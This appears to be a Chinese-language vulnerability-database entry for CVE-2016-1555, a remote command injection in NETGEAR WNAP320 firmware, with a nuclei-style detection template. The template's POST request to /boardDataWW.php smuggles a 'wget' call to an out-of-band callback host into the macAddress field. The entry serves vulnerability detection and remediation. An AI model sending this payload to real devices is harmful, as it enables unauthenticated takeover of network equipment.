CVE-2016-1555: NETGEAR WNAP320 Access Point Firmware - Remote Command Injection

日期: 2025-08-01 | 影响软件: NETGEAR WNAP320 | POC: 已公开

漏洞描述

NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

PoC代码[已公开]

id: CVE-2016-1555

info:
  name: NETGEAR WNAP320 Access Point Firmware - Remote Command Injection
  author: gy741
  severity: critical
  description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.
  remediation: |
    Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
  reference:
    - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
    - https://nvd.nist.gov/vuln/detail/CVE-2016-1555
    - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic
    - http://seclists.org/fulldisclosure/2016/Feb/112
    - http://packetstormsecurity.com/files/135956/D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-1555
    cwe-id: CWE-77
    epss-score: 0.93967
    epss-percentile: 0.99881
    cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: netgear
    product: wnap320_firmware
  tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev

http:
  - raw:
      - |
        POST /boardDataWW.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100a9881777ff720ff7a51b5d7051f6d3b5e639076df03354d447d9dfcf3fd46e3b02205ba0820105af3ec0752b7f1eea63029fedf781db7c5b0bb8b735d1be74a78106:922c64590222798bb761d5b6d8e72950

相关漏洞推荐